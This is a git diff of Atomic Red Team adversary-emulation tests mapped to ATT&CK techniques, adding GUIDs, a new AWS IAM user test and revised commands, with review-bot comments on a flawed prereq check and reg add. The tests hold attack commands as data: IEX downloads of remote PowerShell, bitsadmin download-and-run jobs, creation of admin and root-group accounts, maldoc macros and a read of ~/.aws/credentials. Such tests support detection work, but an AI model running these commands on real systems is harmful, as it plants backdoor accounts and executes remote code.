+**auto_generated_guid:** 6657864e-0323-4206-9344-ac9cd7265a4f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | T1136.001_CMD|
| password | Password of the user to create | String | T1136.001_CMD!|
@@ -135,10 +147,14 @@ new account, run "net user" in powershell or CMD and observe that there is a new
**Supported Platforms:** Windows
+**auto_generated_guid:** bc8be0ac-475c-4fbf-9b1d-9fffd77afbde
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | T1136.001_PowerShell|
@@ -168,10 +184,14 @@ Creates a new user in Linux and adds the user to the `root` group. This techniqu
**Supported Platforms:** Linux
+**auto_generated_guid:** a1040a30-d28b-4eda-bd99-bb2861a4616c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | butter|
| password | Password of the user to create | String | BetterWithButter|
@@ -203,10 +223,14 @@ Creates a new admin user in a command prompt.
**Supported Platforms:** Windows
+**auto_generated_guid:** fda74566-a604-4581-a4cc-fbbe21d66559
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | T1136.001_Admin|
| password | Password of the user to create | String | T1136_pass|
diff --git a/atomics/T1136.002/T1136.002.md b/atomics/T1136.002/T1136.002.md
index cf70f9c5..7ab024da 100644
--- a/atomics/T1136.002/T1136.002.md
+++ b/atomics/T1136.002/T1136.002.md
@@ -21,10 +21,14 @@ Creates a new domain admin user in a command prompt.
**Supported Platforms:** Windows
+**auto_generated_guid:** fcec2963-9951-4173-9bfa-98d8b7834e62
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | T1136.002_Admin|
| password | Password of the user to create | String | T1136_pass123!|
@@ -57,10 +61,14 @@ Create a new account similar to ANONYMOUS LOGON in a command prompt.
**Supported Platforms:** Windows
+**auto_generated_guid:** dc7726d2-8ccb-4cc6-af22-0d5afb53a548
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | ANONYMOUS LOGON|
| password | Password of the user to create | String | T1136_pass123!|
@@ -91,10 +99,14 @@ Creates a new Domain User using the credentials of the Current User
**Supported Platforms:** Windows
+**auto_generated_guid:** 5a3497a4-1568-4663-b12a-d4a5ed70c7d7
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Name of the Account to be created | String | T1136.002_Admin|
| password | Password of the Account to be created | String | T1136_pass123!|
diff --git a/atomics/T1136.003/T1136.003.md b/atomics/T1136.003/T1136.003.md
new file mode 100644
index 00000000..e95db1fc
--- /dev/null
+++ b/atomics/T1136.003/T1136.003.md
@@ -0,0 +1,60 @@
+# T1136.003 - Cloud Account
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1136/003)
+Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
+
+Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.
+
+## Atomic Tests
+
+- [Atomic Test #1 - AWS - Create a new IAM user](#atomic-test-1---aws---create-a-new-iam-user)
+
+
+
+
+## Atomic Test #1 - AWS - Create a new IAM user
+Creates a new IAM user in AWS. Upon successful creation, a new user will be created. Adversaries create new IAM users so that their malicious activity do not interupt the normal functions of the compromised users and can remain undetected for a long time
+
+**Supported Platforms:** Iaas:aws
+
+
+**auto_generated_guid:** 8d1c2368-b503-40c9-9057-8e42f21c58ad
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Username of the IAM user to create in AWS | String | atomicredteam|
+
+
+#### Attack Commands: Run with `sh`!
+
+
+```sh
+aws iam create-user --user-name #{username}
+```
+
+#### Cleanup Commands:
+```sh
+aws iam delete-user --user-name #{username}
+```
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: Check if ~/.aws/credentials file has a default stanza is configured
+##### Check Prereq Commands:
+```sh
+cat ~/.aws/credentials | grep "default"
+```
+##### Get Prereq Commands:
+```sh
+echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+```
+
+
+
+
+
diff --git a/atomics/T1136.003/T1136.003.yaml b/atomics/T1136.003/T1136.003.yaml
new file mode 100644
index 00000000..4083c296
--- /dev/null
+++ b/atomics/T1136.003/T1136.003.yaml
@@ -0,0 +1,28 @@
+attack_technique: T1136.003
+display_name: 'Create Account: Cloud Account'
+atomic_tests:
+- name: AWS - Create a new IAM user
+ auto_generated_guid: 8d1c2368-b503-40c9-9057-8e42f21c58ad
+ description: |
+ Creates a new IAM user in AWS. Upon successful creation, a new user will be created. Adversaries create new IAM users so that their malicious activity do not interupt the normal functions of the compromised users and can remain undetected for a long time
+ supported_platforms:
+ - iaas:aws
+ input_arguments:
+ username:
+ description: Username of the IAM user to create in AWS
+ type: String
+ default: "atomicredteam"
+ dependencies:
+ - description: |
+ Check if ~/.aws/credentials file has a default stanza is configured
+ prereq_command: |
+ cat ~/.aws/credentials | grep "default"
+ get_prereq_command: |
+ echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+ executor:
+ command: |
+ aws iam create-user --user-name #{username}
+ cleanup_command: |
+ aws iam delete-user --user-name #{username}
+ name: sh
+ elevation_required: false
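Review bot: The `prereq_command` `cat ~/.aws/credentials | grep "default"` matches the word anywhere in the file (a comment, or a profile named `default-old`) and never checks that the `aws` binary the executor needs is installed, so the check can pass on a host where the test then fails at the `aws iam create-user` call. It also fails with a missing-file error when credentials come from the environment or an instance role rather than the file — presumably the file-based default profile is the intended scope, and that is worth stating in the dependency description. A tighter check that also covers the CLI: `command -v aws >/dev/null 2>&1 && grep -q '^\[default\]' ~/.aws/credentials 2>/dev/null`. The `get_prereq_command` message has a typo (`defult`) and the test description has `interupt`; both are carried verbatim into the generated T1136.003.md.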
diff --git a/atomics/T1137.002/T1137.002.md b/atomics/T1137.002/T1137.002.md
index 48f9de53..630447b7 100644
--- a/atomics/T1137.002/T1137.002.md
+++ b/atomics/T1137.002/T1137.002.md
@@ -23,10 +23,14 @@ application is started. Key is used for debugging purposes. Not created by defau
**Supported Platforms:** Windows
+**auto_generated_guid:** c3e35b58-fe1c-480b-b540-7600fb612563
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll|
diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md
index 858ef875..28762842 100644
--- a/atomics/T1137.004/T1137.004.md
+++ b/atomics/T1137.004/T1137.004.md
@@ -20,10 +20,14 @@ Triggering the payload requires manually opening Outlook and viewing the targett
**Supported Platforms:** Windows
+**auto_generated_guid:** 7a91ad51-e6d2-4d43-9471-f26362f5738e
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) | string | file://PathToAtomicsFolder\T1137.004\src\T1137.004.html|
| outlook_version | Version of Outlook that is installed | string | 16.0|
diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md
index 6d0f575f..b765083c 100644
--- a/atomics/T1137/T1137.md
+++ b/atomics/T1137/T1137.md
@@ -21,6 +21,10 @@ Too achieve this two things must happened on the syste
**Supported Platforms:** Windows
+**auto_generated_guid:** bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c
+
+
+
@@ -28,14 +32,14 @@ Too achieve this two things must happened on the syste
```cmd
-reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4
-if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ )
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f
+mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1
echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
```
#### Cleanup Commands:
```cmd
-reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f
del %APPDATA%\Microsoft\Outlook\VbaProject.OTM
```
diff --git a/atomics/T1137/T1137.yaml b/atomics/T1137/T1137.yaml
index 58a9a9e6..238f7a5b 100644
--- a/atomics/T1137/T1137.yaml
+++ b/atomics/T1137/T1137.yaml
@@ -13,10 +13,10 @@ atomic_tests:
- windows
executor:
command: |
- reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4
- if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ )
+ reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f
+ mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1
echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
cleanup_command: |
- reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f
+ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f
del %APPDATA%\Microsoft\Outlook\VbaProject.OTM
name: command_prompt
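Review bot: `reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f` has no `/v`, so it creates a subkey named `Level` and writes 1 into that subkey's (Default) value; the `Level` value under `Security` that the test is evidently targeting is never written, and a detection keyed on that value is not exercised by this test. The value name belongs in `/v`: `reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v Level /t REG_DWORD /d 1 /f`, and the cleanup should then remove the value rather than a key: `reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v Level /f`. The generated T1137.md hunk above mirrors both lines and would be regenerated from this file.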
diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md
index 71607740..c4b0d4ed 100644
--- a/atomics/T1140/T1140.md
+++ b/atomics/T1140/T1140.md
@@ -22,10 +22,14 @@ Upon execution a file named T1140_calc_decoded.exe will be placed in the temp fo
**Supported Platforms:** Windows
+**auto_generated_guid:** dc6fe391-69e6-4506-bd06-ea5eeb4082f8
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable | name of executable | path | C:\Windows\System32\calc.exe|
@@ -57,10 +61,14 @@ Rename certutil and decode a file. This is in reference to latest research by Fi
**Supported Platforms:** Windows
+**auto_generated_guid:** 71abc534-3c05-4d0c-80f7-cbe93cb2aa94
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable | name of executable/file to decode | path | C:\Windows\System32\calc.exe|
diff --git a/atomics/T1176/T1176.md b/atomics/T1176/T1176.md
index 087753e7..4cc5ff74 100644
--- a/atomics/T1176/T1176.md
+++ b/atomics/T1176/T1176.md
@@ -29,6 +29,10 @@ Turn on Chrome developer mode and Load Extension found in the src directory
**Supported Platforms:** Linux, Windows, macOS
+**auto_generated_guid:** 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1
+
+
+
#### Run it with these steps!
@@ -55,6 +59,10 @@ Install the "Minimum Viable Malicious Extension" Chrome extension
**Supported Platforms:** Linux, Windows, macOS
+**auto_generated_guid:** 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
+
+
+
#### Run it with these steps!
@@ -78,6 +86,10 @@ Create a file called test.wma, with the duration of 30 seconds
**Supported Platforms:** Linux, Windows, macOS
+**auto_generated_guid:** cb790029-17e6-4c43-b96f-002ce5f10938
+
+
+
#### Run it with these steps!
@@ -103,6 +115,10 @@ Adversaries may use VPN extensions in an attempt to hide traffic sent from a com
**Supported Platforms:** Windows, macOS
+**auto_generated_guid:** 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5
+
+
+
#### Run it with these steps!
diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md
index d0b70b42..634b81f0 100644
--- a/atomics/T1197/T1197.md
+++ b/atomics/T1197/T1197.md
@@ -28,10 +28,14 @@ and execute a payload
**Supported Platforms:** Windows
+**auto_generated_guid:** 3c73d728-75fb-4180-a12f-6712864d7421
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
| local_file | Local file path to save downloaded file | path | %temp%\bitsadmin1_flag.ps1|
@@ -65,10 +69,14 @@ Upon execution you will find a github markdown file downloaded to the Temp direc
**Supported Platforms:** Windows
+**auto_generated_guid:** f63b8bc4-07e5-4112-acba-56f646f3f0bc
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
| local_file | Local file path to save downloaded file | path | $env:TEMP\bitsadmin2_flag.ps1|
@@ -102,10 +110,14 @@ This job will remain in the BITS queue until complete or for up to 90 days by de
**Supported Platforms:** Windows
+**auto_generated_guid:** 62a06ec5-5754-47d2-bcfc-123d8314c6ae
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_path | Path of command to execute | path | C:\Windows\system32\notepad.exe|
| bits_job_name | Name of BITS job | string | AtomicBITS|
@@ -119,7 +131,7 @@ This job will remain in the BITS queue until complete or for up to 90 days by de
```cmd
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
-bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
+bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
bitsadmin.exe /resume #{bits_job_name}
timeout 5
bitsadmin.exe /complete #{bits_job_name}
@@ -146,10 +158,14 @@ and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windo
**Supported Platforms:** Windows
+**auto_generated_guid:** afb5e09e-e385-4dee-9a94-6ee60979d114
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
| download_path | Local file path to save downloaded file | path | SYSTEMROOT=C:\Windows\Temp|
diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml
index c7317d0b..6b16915c 100644
--- a/atomics/T1197/T1197.yaml
+++ b/atomics/T1197/T1197.yaml
@@ -77,7 +77,7 @@ atomic_tests:
command: |
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
- bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
+ bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
bitsadmin.exe /resume #{bits_job_name}
timeout 5
bitsadmin.exe /complete #{bits_job_name}
diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md
index f81368ed..e2953cf8 100644
--- a/atomics/T1201/T1201.md
+++ b/atomics/T1201/T1201.md
@@ -29,6 +29,10 @@ Lists the password complexity policy to console on Ubuntu Linux.
**Supported Platforms:** Linux
+**auto_generated_guid:** 085fe567-ac84-47c7-ac4c-2688ce28265b
+
+
+
@@ -53,6 +57,10 @@ Lists the password complexity policy to console on CentOS/RHEL 7.x Linux.
**Supported Platforms:** Linux
+**auto_generated_guid:** 78a12e65-efff-4617-bc01-88f17d71315d
+
+
+
@@ -70,7 +78,7 @@ cat /etc/security/pwquality.conf
##### Description: System must be CentOS or RHEL v7
##### Check Prereq Commands:
```bash
-if [ $(rpm -q --queryformat '%{VERSION}') -eq "7" ]; then exit /b 0; else exit /b 1; fi;
+if [ $(rpm -q --queryformat '%{VERSION}') -eq "7" ]; then exit /b 0; else exit /b 1; fi;
```
##### Get Prereq Commands:
```bash
@@ -89,6 +97,10 @@ Lists the password complexity policy to console on CentOS/RHEL 6.x Linux.
**Supported Platforms:** Linux
+**auto_generated_guid:** 6ce12552-0adb-4f56-89ff-95ce268f6358
+
+
+
@@ -107,7 +119,7 @@ cat /etc/security/pwquality.conf
##### Description: System must be CentOS or RHEL v6
##### Check Prereq Commands:
```bash
-if [ $(rpm -q --queryformat '%{VERSION}') -eq "6" ]; then exit /b 0; else exit /b 1; fi;
+if [ $(rpm -q --queryformat '%{VERSION}') -eq "6" ]; then exit /b 0; else exit /b 1; fi;
```
##### Get Prereq Commands:
```bash
@@ -126,6 +138,10 @@ Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
**Supported Platforms:** Linux
+**auto_generated_guid:** 7c86c55c-70fa-4a05-83c9-3aa19b145d1a
+
+
+
@@ -150,6 +166,10 @@ Lists the local password policy to console on Windows.
**Supported Platforms:** Windows
+**auto_generated_guid:** 4588d243-f24e-4549-b2e3-e627acc089f6
+
+
+
@@ -174,6 +194,10 @@ Lists the domain password policy to console on Windows.
**Supported Platforms:** Windows
+**auto_generated_guid:** 46c2c362-2679-4ef5-aec9-0e958e135be4
+
+
+
@@ -198,6 +222,10 @@ Lists the password policy to console on macOS.
**Supported Platforms:** macOS
+**auto_generated_guid:** 4b7fa042-9482-45e1-b348-4b756b2a0742
+
+
+
diff --git a/atomics/T1202/T1202.md b/atomics/T1202/T1202.md
index 4aab2fdb..fb234e50 100644
--- a/atomics/T1202/T1202.md
+++ b/atomics/T1202/T1202.md
@@ -23,10 +23,14 @@ Upon execution, calc.exe should open
**Supported Platforms:** Windows
+**auto_generated_guid:** cecfea7a-5f03-4cdd-8bc8-6f7c22862440
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| payload_path | Path to payload | path | C:\Windows\System32\calc.exe|
| process | Process to execute | string | calc.exe|
@@ -57,10 +61,14 @@ Upon execution calc.exe will be opened
**Supported Platforms:** Windows
+**auto_generated_guid:** 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process | Process to execute | string | calc.exe|
@@ -89,10 +97,14 @@ Executing it through command line can create process ancestry anomalies
**Supported Platforms:** Windows
+**auto_generated_guid:** cf3391e0-b482-4b02-87fc-ca8362269b29
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process | Process to execute | string | notepad.exe|
diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md
index eda78a1e..0d46e7c3 100644
--- a/atomics/T1204.002/T1204.002.md
+++ b/atomics/T1204.002/T1204.002.md
@@ -37,10 +37,14 @@ References:
**Supported Platforms:** Windows
+**auto_generated_guid:** 8bebc690-18c7-4549-bc98-210f7019efff
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| jse_path | Path for the macro to write out the "malicious" .jse file | String | C:\Users\Public\art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
@@ -50,7 +54,8 @@ References:
```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
@@ -71,7 +76,7 @@ try {
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
-} catch { exit 1 }
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -90,10 +95,14 @@ Uses cscript //E:jscript to download a file
**Supported Platforms:** Windows
+**auto_generated_guid:** 3f3af983-118a-4fa1-85d3-ba4daa739d80
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js|
| file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt|
@@ -126,10 +135,14 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
**Supported Platforms:** Windows
+**auto_generated_guid:** 0330a5d2-a45a-4272-a9ee-e364411c4b18
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word or Excel | String | Word|
@@ -138,7 +151,8 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
@@ -155,7 +169,7 @@ try {
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
-} catch { exit 1 }
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -175,10 +189,14 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
**Supported Platforms:** Windows
+**auto_generated_guid:** add560ef-20d6-4011-a937-2c340f930911
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| jse_path | jse file to execute with wscript | Path | C:\Users\Public\art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
@@ -188,7 +206,8 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
@@ -205,7 +224,7 @@ try {
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
-} catch { exit 1 }
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -224,10 +243,14 @@ Microsoft Office creating then launching a .bat script from an AppData directory
**Supported Platforms:** Windows
+**auto_generated_guid:** 9215ea92-1ded-41b7-9cd6-79f9a78397aa
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bat_path | Path to malicious .bat file | String | $("$env:temp\art1204.bat")|
| ms_product | Maldoc application Word or Excel | String | Word|
@@ -237,7 +260,8 @@ Microsoft Office creating then launching a .bat script from an AppData directory
```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
```
@@ -254,7 +278,7 @@ try {
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
-} catch { exit 1 }
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -278,10 +302,14 @@ with Excel matches that of the local system. This username can be found under Fi
**Supported Platforms:** Windows
+**auto_generated_guid:** 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| download_url | Download URL | String | https://live.sysinternals.com/procexp.exe|
| uname | Username for pathing | String | $env:Username|
@@ -362,7 +390,7 @@ try {
New-Object -COMObject "Excel.Application" | Out-Null
Stop-Process -Name "Excel"
exit 0
-} catch { exit 1 }
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -383,6 +411,10 @@ and pull down the script and execute it. By default the payload will execute cal
**Supported Platforms:** Windows
+**auto_generated_guid:** a19ee671-ed98-4e9d-b19c-d1954a51585a
+
+
+
@@ -390,7 +422,8 @@ and pull down the script and execute it. By default the payload will execute cal
```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
```
@@ -404,7 +437,7 @@ Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode
try {
$wdApp = New-Object -COMObject "Word.Application"
Stop-Process -Name "winword"
- exit 0 } catch { exit 1 }
+ exit 0 } catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -416,7 +449,7 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
try {
$chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName
exit 0
-} catch { exit 1 }
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -435,10 +468,14 @@ The Potentially Unwanted Applications (PUA) protection feature in antivirus soft
**Supported Platforms:** Windows
+**auto_generated_guid:** 02f35d62-9fdc-4a97-b899-a5d9a876d295
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| pua_url | url to PotentiallyUnwanted.exe | url | http://amtso.eicar.org/PotentiallyUnwanted.exe|
| pua_file | path to PotentiallyUnwanted.exe | Path | $env:TEMP/PotentiallyUnwanted.exe|
diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml
index 971dda55..a39afdda 100644
--- a/atomics/T1204.002/T1204.002.yaml
+++ b/atomics/T1204.002/T1204.002.yaml
@@ -36,7 +36,8 @@ atomic_tests:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
cleanup_command: |
